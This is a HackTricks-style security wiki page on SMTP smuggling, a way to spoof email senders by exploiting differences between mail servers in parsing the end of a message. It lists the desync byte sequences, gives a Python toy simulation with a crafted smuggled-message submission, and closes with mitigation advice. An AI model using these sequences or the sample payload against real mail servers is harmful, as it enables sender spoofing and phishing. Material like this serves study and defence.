# SMTP Smuggling
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
This type of vulnerability was [**originally described in this post**](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/), which explains that it is possible to **abuse differences in how the SMTP protocol is interpreted** when an email is terminated. This lets an attacker smuggle additional emails inside the body of a legitimate one, impersonating other users of the affected domain (such as admin@outlook.com) while bypassing protections such as SPF.
### Why
This is possible because, in the SMTP protocol, the **message data** sent in the email is controlled by the user (the attacker), who can submit crafted data that abuses differences between parsers so that extra emails are smuggled to the recipient. Look at this example taken from the original post:
<figure><img src="../../.gitbook/assets/image (8) (1).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
### How
To exploit this vulnerability, the attacker needs to send data that the **outbound SMTP server treats as 1 email but the inbound SMTP server treats as several emails**.
The researchers found that **inbound servers accept, as the end of the message data, byte sequences that outbound servers do not recognise** as such.\
For example, the standard end-of-data sequence (RFC 5321) is `\r\n.\r\n`. But if the inbound SMTP server also accepts `\n.\n`, an attacker can simply put **that sequence in the body of his email and then start writing the SMTP commands** of a new email in order to smuggle it, as shown in the image above.
Of course, this only works if the **outbound SMTP server does not treat that sequence** as the end of the message data: if it did, it would see 2 emails instead of 1 and handle the second one as a separate submission. That mismatch between the two servers is the desynchronization abused in this vulnerability.
Possible desynchronization sequences:
* `\n.\n`
* `\n.\r\n`
Also note that SPF is bypassed: SPF is evaluated by the inbound server against the IP of the connecting server and the `MAIL FROM` domain, so if you smuggle an email from `admin@outlook.com` inside an email from `user@outlook.com`, the smuggled message is still delivered by outlook.com's own outbound server and **the sender domain is still `outlook.com`**, which passes the check.
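The desync described above, as an added example that is not code from the original post or from the researchers: a toy submission/relay/inbound pipeline in Python where the only difference between the two servers is which end-of-data sequences they accept. The parser, the addresses and the message contents are constructed for illustration; the terminator sequences are the ones listed above.

```python
"""Toy model of the SMTP smuggling desync.

Added illustration, not code from the original post: two minimal SMTP
parsers that differ only in which byte sequences they accept as the end of
DATA. The "outbound" (submission) server is strict and ends a message only
on the RFC 5321 terminator CRLF.CRLF; the "inbound" server is lenient and
also ends it on LF.LF and LF.CRLF. Addresses and message contents are
constructed samples.
"""

STRICT = (b"\r\n.\r\n",)
LENIENT = (b"\r\n.\r\n", b"\n.\n", b"\n.\r\n")


def parse_session(stream: bytes, terminators) -> list:
    """Parse the MAIL/RCPT/DATA part of an SMTP session.

    Returns one dict per message ({"from", "to", "body"}). DATA ends at the
    earliest occurrence of any accepted terminator; whatever follows is
    parsed as fresh commands, which is what lets a lenient server accept a
    second envelope hidden in what a strict server considered body text.
    """
    messages, current, pos = [], None, 0
    while pos < len(stream):
        nl = stream.find(b"\n", pos)
        nl = len(stream) if nl == -1 else nl
        line = stream[pos:nl].rstrip(b"\r")
        pos = nl + 1
        upper = line.upper()
        if upper.startswith(b"MAIL FROM:"):
            current = {"from": line[10:].strip().strip(b"<>").decode(),
                       "to": [], "body": b""}
        elif upper.startswith(b"RCPT TO:"):
            current["to"].append(line[8:].strip().strip(b"<>").decode())
        elif upper == b"DATA":
            hits = [(stream.find(t, pos), t) for t in terminators]
            hits = [(i, t) for i, t in hits if i != -1]
            if not hits:
                raise ValueError("DATA never terminated")
            end, term = min(hits)          # earliest terminator wins
            current["body"] = stream[pos:end]
            messages.append(current)
            current, pos = None, end + len(term)
        # EHLO, QUIT and other commands are ignored in this toy
    return messages


def relay(message: dict) -> bytes:
    """What the outbound server forwards to the inbound server: its own
    envelope, the accepted body byte-for-byte, and a proper CRLF.CRLF."""
    envelope = b"MAIL FROM:<%s>\r\n" % message["from"].encode()
    envelope += b"".join(b"RCPT TO:<%s>\r\n" % r.encode() for r in message["to"])
    return envelope + b"DATA\r\n" + message["body"] + b"\r\n.\r\n"


# Attacker's submission to its provider's outbound server (constructed).
# The smuggled terminator "\n.\n" is not recognised by STRICT, so everything
# up to the final "\r\n.\r\n" is one message body from the outbound view.
SMUGGLED_TERMINATOR = b"\n.\n"
ATTACKER_SUBMISSION = b"".join([
    b"MAIL FROM:<user@outlook.com>\r\n",
    b"RCPT TO:<victim@example.com>\r\n",
    b"DATA\r\n",
    b"From: user@outlook.com\r\nSubject: legit message\r\n\r\nHello",
    SMUGGLED_TERMINATOR,                    # inbound ends message 1 here
    b"MAIL FROM:<admin@outlook.com>\r\n",   # smuggled envelope
    b"RCPT TO:<victim@example.com>\r\n",
    b"DATA\r\n",
    b"From: admin@outlook.com\r\nSubject: urgent\r\n\r\nSmuggled content",
    b"\r\n.\r\n",                           # the only terminator STRICT accepts
])


def smuggle_demo() -> tuple:
    """Return (messages seen by outbound, messages seen by inbound,
    envelope senders the inbound server ends up accepting)."""
    outbound_view = parse_session(ATTACKER_SUBMISSION, STRICT)
    inbound_view = []
    for msg in outbound_view:
        inbound_view.extend(parse_session(relay(msg), LENIENT))
    return len(outbound_view), len(inbound_view), [m["from"] for m in inbound_view]


def no_desync_demo() -> int:
    """If the outbound server accepted the same terminators as the inbound
    one, it would already see two submissions and could police the second
    envelope itself; the hidden-in-body trick needs the mismatch."""
    return len(parse_session(ATTACKER_SUBMISSION, LENIENT))


if __name__ == "__main__":
    print(smuggle_demo())     # (1, 2, ['user@outlook.com', 'admin@outlook.com'])
    print(no_desync_demo())   # 2
```

The practical check this suggests works on both ends: the outbound server should reject or normalise bare `\n` line endings inside DATA before relaying, and the inbound server should honour only `\r\n.\r\n` as end-of-data; with either change both parsers above report the same message count and the second envelope never becomes a command.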
## **References**
* [https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/](https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/)